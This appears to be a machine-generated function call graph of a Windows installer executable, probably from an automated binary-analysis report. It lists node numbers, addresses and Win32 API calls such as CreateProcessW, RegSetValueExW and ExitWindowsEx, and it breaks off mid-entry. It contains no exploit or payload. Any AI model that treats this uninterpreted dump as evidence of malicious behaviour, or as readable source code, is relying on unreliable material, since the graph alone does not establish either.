4805->4795 4806 406b44 GlobalFree 4807 406b4d GlobalAlloc 4806->4807 4807->4805 4807->4808 4808->4805 4808->4806 4808->4807 4809 406bc4 GlobalAlloc 4808->4809 4810 406bbb GlobalFree 4808->4810 4809->4805 4809->4808 4810->4809 4811->4779 5604 4014f5 SetForegroundWindow 5605 402c2f 5604->5605 5606 401a77 5607 402d89 21 API calls 5606->5607 5608 401a80 5607->5608 5609 402d89 21 API calls 5608->5609 5610 401a25 5609->5610 5611 401578 5612 401591 5611->5612 5613 401588 ShowWindow 5611->5613 5614 402c2f 5612->5614 5615 40159f ShowWindow 5612->5615 5613->5612 5615->5614 5616 4023f9 5617 402dab 21 API calls 5616->5617 5618 402408 5617->5618 5619 402dab 21 API calls 5618->5619 5620 402411 5619->5620 5621 402dab 21 API calls 5620->5621 5622 40241b GetPrivateProfileStringW 5621->5622 5623 6fe21058 5624 6fe21074 5623->5624 5625 6fe210dd 5624->5625 5626 6fe21092 5624->5626 5636 6fe215b6 5624->5636 5628 6fe215b6 GlobalFree 5626->5628 5629 6fe210a2 5628->5629 5630 6fe210b2 5629->5630 5631 6fe210a9 GlobalSize 5629->5631 5632 6fe210b6 GlobalAlloc 5630->5632 5633 6fe210c7 5630->5633 5631->5630 5634 6fe215dd 3 API calls 5632->5634 5635 6fe210d2 GlobalFree 5633->5635 5634->5633 5635->5625 5638 6fe215bc 5636->5638 5637 6fe215c2 5637->5626 5638->5637 5639 6fe215ce GlobalFree 5638->5639 5639->5626 5640 401ffb 5641 402dab 21 API calls 5640->5641 5642 402002 5641->5642 5643 40687e 2 API calls 5642->5643 5644 402008 5643->5644 5646 402019 5644->5646 5647 406468 wsprintfW 5644->5647 5647->5646 4861 4034fc SetErrorMode GetVersionExW 4862 403550 GetVersionExW 4861->4862 4863 403588 4861->4863 4862->4863 4864 4035df 4863->4864 4865 406915 5 API calls 4863->4865 4866 4068a5 3 API calls 4864->4866 4865->4864 4867 4035f5 lstrlenA 4866->4867 4867->4864 4868 403605 4867->4868 4869 406915 5 API calls 4868->4869 4870 40360c 4869->4870 4871 406915 5 API calls 4870->4871 4872 403613 4871->4872 4873 406915 5 API calls 4872->4873 4875 40361f #17 OleInitialize SHGetFileInfoW 4873->4875 4949 406521 lstrcpynW 4875->4949 4877 40366e GetCommandLineW 4950 406521 lstrcpynW 4877->4950 4879 403680 4880 405e1d CharNextW 4879->4880 4881 4036a6 CharNextW 4880->4881 4889 4036b8 4881->4889 4882 4037ba 4883 4037ce GetTempPathW 4882->4883 4951 4034cb 4883->4951 4885 4037e6 4886 403840 DeleteFileW 4885->4886 4887 4037ea GetWindowsDirectoryW lstrcatW 4885->4887 4961 403082 GetTickCount GetModuleFileNameW 4886->4961 4890 4034cb 12 API calls 4887->4890 4888 405e1d CharNextW 4888->4889 4889->4882 4889->4888 4895 4037bc 4889->4895 4892 403806 4890->4892 4892->4886 4894 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4892->4894 4893 403854 4896 40390b 4893->4896 4899 4038fb 4893->4899 4903 405e1d CharNextW 4893->4903 4897 4034cb 12 API calls 4894->4897 5045 406521 lstrcpynW 4895->5045 5053 403b19 4896->5053 4901 403838 4897->4901 4989 403bf3 4899->4989 4901->4886 4901->4896 4917 403873 4903->4917 4905 403a59 4907 405b81 MessageBoxIndirectW 4905->4907 4906 403a7d 4908 403b01 ExitProcess 4906->4908 4909 403a85 GetCurrentProcess OpenProcessToken 4906->4909 4915 403a67 ExitProcess 4907->4915 4910 403ad1 4909->4910 4911 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4909->4911 4918 406915 5 API calls 4910->4918 4911->4910 4912 4038d1 4919 405ef8 18 API calls 4912->4919 4913 403914 4916 405aec 5 API calls 4913->4916 4920 403919 lstrlenW 4916->4920 4917->4912 4917->4913 4921 403ad8 4918->4921 4922 4038dd 4919->4922 5048 406521 lstrcpynW 4920->5048 4924 403aed ExitWindowsEx 4921->4924 4926 403afa 4921->4926 4922->4896 5046 406521 lstrcpynW 4922->5046 4924->4908 4924->4926 4925 403933 4928 40394b 4925->4928 5049 406521 lstrcpynW 4925->5049 4929 40140b 2 API calls 4926->4929 4933 403971 wsprintfW 4928->4933 4945 40399d 4928->4945 4929->4908 4930 4038f0 5047 406521 lstrcpynW 4930->5047 4934 40655e 21 API calls 4933->4934 4934->4928 4935 405a75 2 API calls 4935->4945 4936 405acf 2 API calls 4936->4945 4937 4039e7 SetCurrentDirectoryW 4940 4062e1 40 API calls 4937->4940 4938 4039ad GetFileAttributesW 4939 4039b9 DeleteFileW 4938->4939 4938->4945 4939->4945 4941 4039f6 CopyFileW 4940->4941 4941->4896 4941->4945 4942 405c2d 71 API calls 4942->4945 4943 4062e1 40 API calls 4943->4945 4944 40655e 21 API calls 4944->4945 4945->4896 4945->4928 4945->4933 4945->4935 4945->4936 4945->4937 4945->4938 4945->4942 4945->4943 4945->4944 4947 403a6f CloseHandle 4945->4947 4948 40687e 2 API calls 4945->4948 5050 405b04 CreateProcessW 4945->5050 4947->4896 4948->4945 4949->4877 4950->4879 4952 4067cf 5 API calls 4951->4952 4954 4034d7 4952->4954 4953 4034e1 4953->4885 4954->4953 4955 405df0 3 API calls 4954->4955 4956 4034e9 4955->4956 4957 405acf 2 API calls 4956->4957 4958 4034ef 4957->4958 4959 406040 2 API calls 4958->4959 4960 4034fa 4959->4960 4960->4885 5060 406011 GetFileAttributesW CreateFileW 4961->5060 4963 4030c2 4982 4030d2 4963->4982 5061 406521 lstrcpynW 4963->5061 4965 4030e8 4966 405e3c 2 API calls 4965->4966 4967 4030ee 4966->4967 5062 406521 lstrcpynW 4967->5062 4969 4030f9 GetFileSize 4970 4031f3 4969->4970 4988 403110 4969->4988 5063 40301e 4970->5063 4972 4031fc 4974 40322c GlobalAlloc 4972->4974 4972->4982 5075 4034b4 SetFilePointer 4972->5075 4973 40349e ReadFile 4973->4988 5074 4034b4 SetFilePointer 4974->5074 4977 40325f 4979 40301e 6 API calls 4977->4979 4978 403247 4981 4032b9 39 API calls 4978->4981 4979->4982 4980 403215 4983 40349e ReadFile 4980->4983 4986 403253 4981->4986 4982->4893 4985 403220 4983->4985 4984 40301e 6 API calls 4984->4988 4985->4974 4985->4982 4986->4982 4986->4986 4987 403290 SetFilePointer 4986->4987 4987->4982 4988->4970 4988->4973 4988->4977 4988->4982 4988->4984 4990 406915 5 API calls 4989->4990 4991 403c07 4990->4991 4992 403c0d 4991->4992 4993 403c1f 4991->4993 5088 406468 wsprintfW 4992->5088 4994 4063ef 3 API calls 4993->4994 4995 403c4f 4994->4995 4997 403c6e lstrcatW 4995->4997 4999 4063ef 3 API calls 4995->4999 4998 403c1d 4997->4998 5080 403ec9 4998->5080 4999->4997 5002 405ef8 18 API calls 5003 403ca0 5002->5003 5004 403d34 5003->5004 5006 4063ef 3 API calls 5003->5006 5005 405ef8 18 API calls 5004->5005 5007 403d3a 5005->5007 5008 403cd2 5006->5008 5009 403d4a LoadImageW 5007->5009 5010 40655e 21 API calls 5007->5010 5008->5004 5013 403cf3 lstrlenW 5008->5013 5017 405e1d CharNextW 5008->5017 5011 403df0 5009->5011 5012 403d71 RegisterClassW 5009->5012 5010->5009 5016 40140b 2 API calls 5011->5016 5014 403da7 SystemParametersInfoW CreateWindowExW 5012->5014 5015 403dfa 5012->5015 5018 403d01 lstrcmpiW 5013->5018 5019 403d27 5013->5019 5014->5011 5015->4896 5020 403df6 5016->5020 5021 403cf0 5017->5021 5018->5019 5022 403d11 GetFileAttributesW 5018->5022 5023 405df0 3 API calls 5019->5023 5020->5015 5026 403ec9 22 API calls 5020->5026 5021->5013 5025 403d1d 5022->5025 5024 403d2d 5023->5024 5089 406521 lstrcpynW 5024->5089 5025->5019 5029 405e3c 2 API calls 5025->5029 5027 403e07 5026->5027 5030 403e13 ShowWindow 5027->5030 5031 403e96 5027->5031 5029->5019 5032 4068a5 3 API calls 5030->5032 5033 405679 5 API calls 5031->5033 5034 403e2b 5032->5034 5035 403e9c 5033->5035 5038 403e39 GetClassInfoW 5034->5038 5040 4068a5 3 API calls 5034->5040 5036 403ea0 5035->5036 5037 403eb8 5035->5037 5036->5015 5043 40140b 2 API calls 5036->5043 5039 40140b 2 API calls 5037->5039 5041 403e63 DialogBoxParamW 5038->5041 5042 403e4d GetClassInfoW RegisterClassW 5038->5042 5039->5015 5040->5038 5044 40140b 2 API calls 5041->5044 5042->5041 5043->5015 5044->5015 5045->4883 5046->4930 5047->4899 5048->4925 5049->4928 5051 405b43 5050->5051 5052 405b37 CloseHandle 5050->5052 5051->4945 5052->5051 5054 403b31 5053->5054 5055 403b23 CloseHandle 5053->5055 5091 403b5e 5054->5091 5055->5054 5058 405c2d 71 API calls 5059 403a4c OleUninitialize 5058->5059 5059->4905 5059->4906 5060->4963 5061->4965 5062->4969 5064 403027 5063->5064 5065 40303f 5063->5065 5066 403030 DestroyWindow 5064->5066 5067 403037 5064->5067 5068 403047 5065->5068 5069 40304f GetTickCount 5065->5069 5066->5067 5067->4972 5076 406951 5068->5076 5070 403080 5069->5070 5071 40305d CreateDialogParamW ShowWindow 5069->5071 5070->4972 5071->5070 5074->4978 5075->4980 5077 40696e PeekMessageW 5076->5077 5078 406964 DispatchMessageW 5077->5078 5079 40304d 5077->5079 5078->5077 5079->4972 5081 403edd 5080->5081 5090 406468 wsprintfW 5081->5090 5083 403f4e 5084 403f82 22 API calls 5083->5084 5086 403f53 5084->5086 5085 403c7e 5085->5002 5086->5085 5087 40655e 21 API calls 5086->5087 5087->5086 5088->4998 5089->5004 5090->5083 5092 403b6c 5091->5092 5093 403b36 5092->5093 5094 403b71 FreeLibrary GlobalFree 5092->5094 5093->5058 5094->5093 5094->5094 5648 401b7c 5649 402dab 21 API calls 5648->5649 5650 401b83 5649->5650 5651 402d89 21 API calls 5650->5651 5652 401b8c wsprintfW 5651->5652 5653 402c2f 5652->5653 5661 401000 5662 401037 BeginPaint GetClientRect 5661->5662 5663 40100c DefWindowProcW 5661->5663 5665 4010f3 5662->5665 5666 401179 5663->5666 5667 401073 CreateBrushIndirect FillRect DeleteObject 5665->5667 5668 4010fc 5665->5668 5667->5665 5669 401102 CreateFontIndirectW 5668->5669 5670 401167 EndPaint 5668->5670 5669->5670 5671 401112 6 API calls 5669->5671 5670->5666 5671->5670 5672 401680 5673 402dab 21 API calls 5672->5673 5674 401687 5673->5674 5675 402dab 21 API calls 5674->5675 5676 401690 5675->5676 5677 402dab 21 API calls 5676->5677 5678 401699 MoveFileW 5677->5678 5679 4016a5 5678->5679 5680 4016ac 5678->5680 5681 401423 28 API calls 5679->5681 5682 40687e 2 API calls 5680->5682 5684 4022fb 5680->5684 5681->5684 5683 4016bb 5682->5683 5683->5684 5685 4062e1 40 API calls 5683->5685 5685->5679 5686 401503 5687 401508 5686->5687 5689 401520 5686->5689 5688 402d89 21 API calls 5687->5688 5688->5689 4453 402304 4454 402dab 21 API calls 4453->4454 4455 40230a 4454->4455 4456 402dab 21 API calls 4455->4456 4457 402313 4456->4457 4458 402dab 21 API calls 4457->4458 4459 40231c 4458->4459 4468 40687e FindFirstFileW 4459->4468 4462 402336 lstrlenW lstrlenW 4463 4055a6 28 API calls 4462->4463 4465 402374 SHFileOperationW 4463->4465 4466 402329 4465->4466 4467 402331 4465->4467 4466->4467 4471 4055a6 4466->4471 4469 406894 FindClose 4468->4469 4470 402325 4468->4470 4469->4470 4470->4462 4470->4466 4472 4055c1 4471->4472 4480 405663 4471->4480 4473 4055dd lstrlenW 4472->4473 4474 40655e 21 API calls 4472->4474 4475 405606 4473->4475 4476 4055eb lstrlenW 4473->4476 4474->4473 4478 405619 4475->4478 4479 40560c SetWindowTextW 4475->4479 4477 4055fd lstrcatW 4476->4477 4476->4480 4477->4475 4478->4480 4481 40561f SendMessageW SendMessageW SendMessageW 4478->4481 4479->4478 4480->4467 4481->4480 5690 401a04 5691 402dab 21 API calls 5690->5691 5692 401a0b 5691->5692 5693 402dab 21 API calls 5692->5693 5694 401a14 5693->5694 5695 401a1b lstrcmpiW 5694->5695 5696 401a2d lstrcmpW 5694->5696 5697 401a21 5695->5697 5696->5697 5698 401d86 5699 401d99 GetDlgItem 5698->5699 5700 401d8c 5698->5700 5702 401d93 5699->5702 5701 402d89 21 API calls 5700->5701 5701->5702 5703 401dda GetClientRect LoadImageW SendMessageW 5702->5703 5704 402dab 21 API calls 5702->5704 5706 401e38 5703->5706 5708 401e44 5703->5708 5704->5703 5707 401e3d DeleteObject 5706->5707 5706->5708 5707->5708 5709 402388 5710 40238f 5709->5710 5713 4023a2 5709->5713 5711 40655e 21 API calls 5710->5711 5712 40239c 5711->5712 5712->5713 5714 405b81 MessageBoxIndirectW 5712->5714 5714->5713 5715 402c0a SendMessageW 5716 402c24 InvalidateRect 5715->5716 5717 402c2f 5715->5717 5716->5717 5725 404f0d GetDlgItem GetDlgItem 5726 405184 5725->5726 5727 404f5f 7 API calls 5725->5727 5731 405266 5726->5731 5757 4051f3 5726->5757 5779 404e5b SendMessageW 5726->5779 5728 405006 DeleteObject 5727->5728 5729 404ff9 SendMessageW 5727->5729 5730 40500f 5728->5730 5729->5728 5732 405046 5730->5732 5734 40655e 21 API calls 5730->5734 5733 405312 5731->5733 5737 405177 5731->5737 5742 4052bf SendMessageW 5731->5742 5735 4044a0 22 API calls 5732->5735 5738 405324 5733->5738 5739 40531c SendMessageW 5733->5739 5740 405028 SendMessageW SendMessageW 5734->5740 5736 40505a 5735->5736 5741 4044a0 22 API calls 5736->5741 5744 404507 8 API calls 5737->5744 5749 405336 ImageList_Destroy 5738->5749 5750 40533d 5738->5750 5754 40534d 5738->5754 5739->5738 5740->5730 5758 40506b 5741->5758 5742->5737 5747 4052d4 SendMessageW 5742->5747 5743 405258 SendMessageW 5743->5731 5748 405513 5744->5748 5746 4054c7 5746->5737 5755 4054d9 ShowWindow GetDlgItem ShowWindow 5746->5755 5753 4052e7 5747->5753 5749->5750 5751 405346 GlobalFree 5750->5751 5750->5754 5751->5754 5752 405146 GetWindowLongW SetWindowLongW 5756 40515f 5752->5756 5763 4052f8 SendMessageW 5753->5763 5754->5746 5772 405388 5754->5772 5784 404edb 5754->5784 5755->5737 5759 405164 ShowWindow 5756->5759 5760 40517c 5756->5760 5757->5731 5757->5743 5758->5752 5762 4050be SendMessageW 5758->5762 5764 405141 5758->5764 5766 405110 SendMessageW 5758->5766 5767 4050fc SendMessageW 5758->5767 5777 4044d5 SendMessageW 5759->5777 5778 4044d5 SendMessageW 5760->5778 5762->5758 5763->5733 5764->5752 5764->5756 5766->5758 5767->5758 5769 405492 5770 40549d InvalidateRect 5769->5770 5773 4054a9 5769->5773 5770->5773 5771 4053b6 SendMessageW 5776 4053cc 5771->5776 5772->5771 5772->5776 5773->5746 5793 404e16 5773->5793 5775 405440 SendMessageW SendMessageW 5775->5776 5776->5769 5776->5775 5777->5737 5778->5726 5780 404eba SendMessageW 5779->5780 5781 404e7e GetMessagePos ScreenToClient SendMessageW 5779->5781 5782 404eb2 5780->5782 5781->5782 5783 404eb7 5781->5783 5782->5757 5783->5780 5796 406521 lstrcpynW 5784->5796 5786 404eee 5797 406468 wsprintfW 5786->5797 5788 404ef8 5789 40140b 2 API calls 5788->5789 5790 404f01 5789->5790 5798 406521 lstrcpynW 5790->5798 5792 404f08 5792->5772 5799 404d4d 5793->5799 5795 404e2b 5795->5746 5796->5786 5797->5788 5798->5792 5801 404d66 5799->5801 5800 40655e 21 API calls 5802 404dca 5800->5802 5801->5800 5803 40655e 21 API calls 5802->5803 5804 404dd5 5803->5804 5805 40655e 21 API calls 5804->5805 5806 404deb lstrlenW wsprintfW SetDlgItemTextW 5805->5806 5806->5795 5807 40248f 5808 402dab 21 API calls 5807->5808 5809 4024a1 5808->5809 5810 402dab 21 API calls 5809->5810 5811 4024ab 5810->5811 5824 402e3b 5811->5824 5814 402c2f 5815 4024e3 5817 402d89 21 API calls 5815->5817 5819 4024ef 5815->5819 5816 402dab 21 API calls 5820 4024d9 lstrlenW 5816->5820 5817->5819 5818 40250e RegSetValueExW 5822 402524 RegCloseKey 5818->5822 5819->5818 5821 4032b9 39 API calls 5819->5821 5820->5815 5821->5818 5822->5814 5825 402e56 5824->5825 5828 4063bc 5825->5828 5829 4063cb 5828->5829 5830 4024bb 5829->5830 5831 4063d6 RegCreateKeyExW 5829->5831 5830->5814 5830->5815 5830->5816 5831->5830 5832 404610 lstrlenW 5833 404631 WideCharToMultiByte 5832->5833 5834 40462f 5832->5834 5834->5833 5835 402910 5836 402dab 21 API calls 5835->5836 5837 402917 FindFirstFileW 5836->5837 5838 40293f 5837->5838 5842 40292a 5837->5842 5839 402948 5838->5839 5843 406468 wsprintfW 5838->5843 5844 406521 lstrcpynW 5839->5844 5843->5839 5844->5842 5845 401911 5846 401948 5845->5846 5847 402dab 21 API calls 5846->5847 5848 40194d 5847->5848 5849 405c2d 71 API calls 5848->5849 5850 401956 5849->5850 5851 401491 5852 4055a6 28 API calls 5851->5852 5853 401498 5852->5853 5854 404991 5855 4049bd 5854->5855 5856 4049ce 5854->5856 5915 405b65 GetDlgItemTextW 5855->5915 5858 4049da GetDlgItem 5856->5858 5859 404a39 5856->5859 5862 4049ee 5858->5862 5860 404b1d 5859->5860 5867 40655e 21 API calls 5859->5867 5913 404ccc 5859->5913 5860->5913 5917 405b65 GetDlgItemTextW 5860->5917 5861 4049c8 5863 4067cf 5 API calls 5861->5863 5865 404a02 SetWindowTextW 5862->5865 5866 405e9b 4 API calls 5862->5866 5863->5856 5869 4044a0 22 API calls 5865->5869 5871 4049f8 5866->5871 5872 404aad SHBrowseForFolderW 5867->5872 5868 404b4d 5873 405ef8 18 API calls 5868->5873 5874 404a1e 5869->5874 5870 404507 8 API calls 5875 404ce0 5870->5875 5871->5865 5878 405df0 3 API calls 5871->5878 5872->5860 5876 404ac5 CoTaskMemFree 5872->5876 5880 404b53 5873->5880 5877 4044a0 22 API calls 5874->5877 5879 405df0 3 API calls 5876->5879 5881 404a2c 5877->5881 5878->5865 5882 404ad2 5879->5882 5918 406521 lstrcpynW 5880->5918 5916 4044d5 SendMessageW 5881->5916 5885 404b09 SetDlgItemTextW 5882->5885 5890 40655e 21 API calls 5882->5890 5885->5860 5886 404a32 5888 406915 5 API calls 5886->5888 5887 404b6a 5889 406915 5 API calls 5887->5889 5888->5859 5896 404b71 5889->5896 5891 404af1 lstrcmpiW 5890->5891 5891->5885 5894 404b02 lstrcatW 5891->5894 5892 404bb2 5919 406521 lstrcpynW 5892->5919 5894->5885 5895 404bb9 5897 405e9b 4 API calls 5895->5897 5896->5892 5900 405e3c 2 API calls 5896->5900 5902 404c0a 5896->5902 5898 404bbf GetDiskFreeSpaceW 5897->5898 5901 404be3 MulDiv 5898->5901 5898->5902 5900->5896 5901->5902 5903 404c7b 5902->5903 5905 404e16 24 API calls 5902->5905 5904 404c9e 5903->5904 5906 40140b 2 API calls 5903->5906 5920 4044c2 KiUserCallbackDispatcher 5904->5920 5907 404c68 5905->5907 5906->5904 5909 404c7d SetDlgItemTextW 5907->5909 5910 404c6d 5907->5910 5909->5903 5912 404d4d 24 API calls 5910->5912 5911 404cba 5911->5913 5914 4048ea SendMessageW 5911->5914 5912->5903 5913->5870 5914->5913 5915->5861 5916->5886 5917->5868 5918->5887 5919->5895 5920->5911 5921 401914 5922 402dab 21 API calls 5921->5922 5923 40191b 5922->5923 5924 405b81 MessageBoxIndirectW 5923->5924 5925 401924 5924->5925 4812 402896 4813 40289d 4812->4813 4819 402bae 4812->4819 4814 402d89 21 API calls 4813->4814 4815 4028a4 4814->4815 4816 4028b3 SetFilePointer 4815->4816 4817 4028c3 4816->4817 4816->4819 4820 406468 wsprintfW 4817->4820 4820->4819 5926 401f17 5927 402dab 21 API calls 5926->5927 5928 401f1d 5927->5928 5929 402dab 21 API calls 5928->5929 5930 401f26 5929->5930 5931 402dab 21 API calls 5930->5931 5932 401f2f 5931->5932 5933 402dab 21 API calls 5932->5933 5934 401f38 5933->5934 5935 401423 28 API calls 5934->5935 5936 401f3f 5935->5936 5943 405b47 ShellExecuteExW 5936->5943 5938 401f87 5940 402933 5938->5940 5944 4069c0 WaitForSingleObject 5938->5944 5941 401fa4 CloseHandle 5941->5940 5943->5938 5945 4069da 5944->5945 5946 4069ec GetExitCodeProcess 5945->5946 5947 406951 2 API calls 5945->5947 5946->5941 5948 4069e1 WaitForSingleObject 5947->5948 5948->5945 5949 402f98 5950 402fc3 5949->5950 5951 402faa SetTimer 5949->5951 5952 403018 5950->5952 5953 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5950->5953 5951->5950 5953->5952 5954 40551a 5955 40552a 5954->5955 5956 40553e 5954->5956 5957 405530 5955->5957 5966 405587 5955->5966 5958 405546 IsWindowVisible 5956->5958 5964 40555d 5956->5964 5960 4044ec SendMessageW 5957->5960 5961 405553 5958->5961 5958->5966 5959 40558c CallWindowProcW 5962 40553a 5959->5962 5960->5962 5963 404e5b 5 API calls 5961->5963 5963->5964 5964->5959 5965 404edb 4 API calls 5964->5965 5965->5966 5966->5959 5967 401d1c 5968 402d89 21 API calls 5967->5968 5969 401d22 IsWindow 5968->5969 5970 401a25 5969->5970 5971 40149e 5972 4023a2 5971->5972 5973 4014ac PostQuitMessage 5971->5973 5973->5972 5974 6fe2103d 5977 6fe2101b 5974->5977 5978 6fe215b6 GlobalFree 5977->5978 5979 6fe21020 5978->5979 5980 6fe21027 GlobalAlloc 5979->5980 5981 6fe21024 5979->5981 5980->5981 5982 6fe215dd 3 API calls 5981->5982 5983 6fe2103b 5982->5983 4222 401ba0 4223 401bf1 4222->4223 4228 401bad 4222->4228 4224 401c1b GlobalAlloc 4223->4224 4226 401bf6 4223->4226 4241 40655e 4224->4241 4225 401c36 4229 40655e 21 API calls 4225->4229 4235 4023a2 4225->4235 4226->4235 4260 406521 lstrcpynW 4226->4260 4228->4225 4231 401bc4 4228->4231 4232 40239c 4229->4232 4258 406521 lstrcpynW 4231->4258 4232->4235 4261 405b81 4232->4261 4233 401c08 GlobalFree 4233->4235 4237 401bd3 4259 406521 lstrcpynW 4237->4259 4239 401be2 4265 406521 lstrcpynW 4239->4265 4245 406569 4241->4245 4242 4067b0 4243 4067c9 4242->4243 4288 406521 lstrcpynW 4242->4288 4243->4225 4245->4242 4246 406781 lstrlenW 4245->4246 4247 40655e 15 API calls 4245->4247 4251 40667a GetSystemDirectoryW 4245->4251 4252 406690 GetWindowsDirectoryW 4245->4252 4253 406722 lstrcatW 4245->4253 4255 40655e 15 API calls 4245->4255 4257 4066f2 SHGetPathFromIDListW CoTaskMemFree 4245->4257 4266 4063ef 4245->4266 4271 406915 GetModuleHandleA 4245->4271 4277 4067cf 4245->4277 4286 406468 wsprintfW 4245->4286 4287 406521 lstrcpynW 4245->4287 4246->4245 4247->4246 4251->4245 4252->4245 4253->4245 4255->4245 4257->4245 4258->4237 4259->4239 4260->4233 4262 405b96 4261->4262 4263 405be2 4262->4263 4264 405baa MessageBoxIndirectW 4262->4264 4263->4235 4264->4263 4265->4235 4289 40638e 4266->4289 4269 406423 RegQueryValueExW RegCloseKey 4270 406453 4269->4270 4270->4245 4272 406931 4271->4272 4273 40693b GetProcAddress 4271->4273 4293 4068a5 GetSystemDirectoryW 4272->4293 4275 40694a 4273->4275 4275->4245 4276 406937 4276->4273 4276->4275 4284 4067dc 4277->4284 4278 406852 4279 406857 CharPrevW 4278->4279 4281 406878 4278->4281 4279->4278 4280 406845 CharNextW 4280->4278 4280->4284 4281->4245 4283 406831 CharNextW 4283->4284 4284->4278 4284->4280 4284->4283 4285 406840 CharNextW 4284->4285 4296 405e1d 4284->4296 4285->4280 4286->4245 4287->4245 4288->4243 4290 40639d 4289->4290 4291 4063a1 4290->4291 4292 4063a6 RegOpenKeyExW 4290->4292 4291->4269 4291->4270 4292->4291 4294 4068c7 wsprintfW LoadLibraryExW 4293->4294 4294->4276 4297 405e23 4296->4297 4298 405e39 4297->4298 4299 405e2a CharNextW 4297->4299 4298->4284 4299->4297 4316 403fa1 4317 403fb9 4316->4317 4318 40411a 4316->4318 4317->4318 4319 403fc5 4317->4319 4320 40416b 4318->4320 4321 40412b GetDlgItem GetDlgItem 4318->4321 4322 403fd0 SetWindowPos 4319->4322 4323 403fe3 4319->4323 4325 4041c5 4320->4325 4336 401389 2 API calls 4320->4336 4324 4044a0 22 API calls 4321->4324 4322->4323 4327 403fec ShowWindow 4323->4327 4328 40402e 4323->4328 4329 404155 SetClassLongW 4324->4329 4330 404115 4325->4330 4389 4044ec 4325->4389 4331 404107 4327->4331 4332 40400c GetWindowLongW 4327->4332 4333 404036 DestroyWindow 4328->4333 4334 40404d 4328->4334 4335 40140b 2 API calls 4329->4335 4411 404507 4331->4411 4332->4331 4338 404025 ShowWindow 4332->4338 4339 404429 4333->4339 4340 404052 SetWindowLongW 4334->4340 4341 404063 4334->4341 4335->4320 4342 40419d 4336->4342 4338->4328 4339->4330 4347 40445a ShowWindow 4339->4347 4340->4330 4341->4331 4346 40406f GetDlgItem 4341->4346 4342->4325 4343 4041a1 SendMessageW 4342->4343 4343->4330 4344 40140b 2 API calls 4359 4041d7 4344->4359 4345 40442b DestroyWindow EndDialog 4345->4339 4348 404080 SendMessageW IsWindowEnabled 4346->4348 4349 40409d 4346->4349 4347->4330 4348->4330 4348->4349 4351 4040aa 4349->4351 4352 4040f1 SendMessageW 4349->4352 4353 4040bd 4349->4353 4362 4040a2 4349->4362 4350 40655e 21 API calls 4350->4359 4351->4352 4351->4362 4352->4331 4356 4040c5 4353->4356 4357 4040da 4353->4357 4355 4044a0 22 API calls 4355->4359 4405 40140b 4356->4405 4361 40140b 2 API calls 4357->4361 4358 4040d8 4358->4331 4359->4330 4359->4344 4359->4345 4359->4350 4359->4355 4380 40436b DestroyWindow 4359->4380 4392 4044a0 4359->4392 4363 4040e1 4361->4363 4408 404479 4362->4408 4363->4331 4363->4362 4365 404252 GetDlgItem 4366 404267 4365->4366 4367 40426f ShowWindow KiUserCallbackDispatcher 4365->4367 4366->4367 4395 4044c2 KiUserCallbackDispatcher 4367->4395 4369 404299 EnableWindow 4374 4042ad 4369->4374 4370 4042b2 GetSystemMenu EnableMenuItem SendMessageW 4371 4042e2 SendMessageW 4370->4371 4370->4374 4371->4374 4374->4370 4396 4044d5 SendMessageW 4374->4396 4397 403f82 4374->4397 4400 406521 lstrcpynW 4374->4400 4376 404311 lstrlenW 4377 40655e 21 API calls 4376->4377 4378 404327 SetWindowTextW 4377->4378 4401 401389 4378->4401 4380->4339 4381 404385 CreateDialogParamW 4380->4381 4381->4339 4382 4043b8 4381->4382 4383 4044a0 22 API calls 4382->4383 4384 4043c3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4383->4384 4385 401389 2 API calls 4384->4385 4386 404409 4385->4386 4386->4330 4387 404411 ShowWindow 4386->4387 4388 4044ec SendMessageW 4387->4388 4388->4339 4390 404504 4389->4390 4391 4044f5 SendMessageW 4389->4391 4390->4359 4391->4390 4393 40655e 21 API calls 4392->4393 4394 4044ab SetDlgItemTextW 4393->4394 4394->4365 4395->4369 4396->4374 4398 40655e 21 API calls 4397->4398 4399 403f90 SetWindowTextW 4398->4399 4399->4374 4400->4376 4403 401390 4401->4403 4402 4013fe 4402->4359 4403->4402 4404 4013cb MulDiv SendMessageW 4403->4404 4404->4403 4406 401389 2 API calls 4405->4406 4407 401420 4406->4407 4407->4362 4409 404480 4408->4409 4410 404486 SendMessageW 4408->4410 4409->4410 4410->4358 4412 4045ca 4411->4412 4413 40451f GetWindowLongW 4411->4413 4412->4330 4413->4412 4414 404534 4413->4414 4414->4412 4415 404561 GetSysColor 4414->4415 4416 404564 4414->4416 4415->4416 4417 404574 SetBkMode 4416->4417 4418 40456a SetTextColor 4416->4418 4419 404592 4417->4419 4420 40458c GetSysColor 4417->4420 4418->4417 4421 4045a3 4419->4421 4422 404599 SetBkColor 4419->4422 4420->4419 4421->4412 4423 4045b6 DeleteObject 4421->4423 4424 4045bd CreateBrushIndirect 4421->4424 4422->4421 4423->4424 4424->4412 5984 402621 5985 402dab 21 API calls 5984->5985 5986 402628 5985->5986 5989 406011 GetFileAttributesW CreateFileW 5986->5989 5988 402634 5989->5988 5990 6fe21000 5991 6fe2101b 5 API calls 5990->5991 5992 6fe21019 5991->5992 4436 4025a3 4448 402deb 4436->4448 4439 402d89 21 API calls 4440 4025b6 4439->4440 4441 4025c5 4440->4441 4446 402933 4440->4446 4442 4025d2 RegEnumKeyW 4441->4442 4443 4025de RegEnumValueW 4441->4443 4444 4025fa RegCloseKey 4442->4444 4443->4444 4445 4025f3 4443->4445 4444->4446 4445->4444 4449 402dab 21 API calls 4448->4449 4450 402e02 4449->4450 4451 40638e RegOpenKeyExW 4450->4451 4452 4025ad 4451->4452 4452->4439 4698 4015a8 4699 402dab 21 API calls 4698->4699 4700 4015af SetFileAttributesW 4699->4700 4701 4015c1 4700->4701 6000 401fa9 6001 402dab 21 API calls 6000->6001 6002 401faf 6001->6002 6003 4055a6 28 API calls 6002->6003 6004 401fb9 6003->6004 6005 405b04 2 API calls 6004->6005 6006 401fbf 6005->6006 6007 402933 6006->6007 6008 4069c0 5 API calls 6006->6008 6011 401fe2 CloseHandle 6006->6011 6010 401fd4 6008->6010 6010->6011 6013 406468 wsprintfW 6010->6013 6011->6007 6013->6011 4702 40252f 4703 402deb 21 API calls 4702->4703 4704 402539 4703->4704 4705 402dab 21 API calls 4704->4705 4706 402542 4705->4706 4707 40254d RegQueryValueExW 4706->4707 4710 402933 4706->4710 4708 402573 RegCloseKey 4707->4708 4709 40256d 4707->4709 4708->4710 4709->4708 4713 406468 wsprintfW 4709->4713 4713->4708 6014 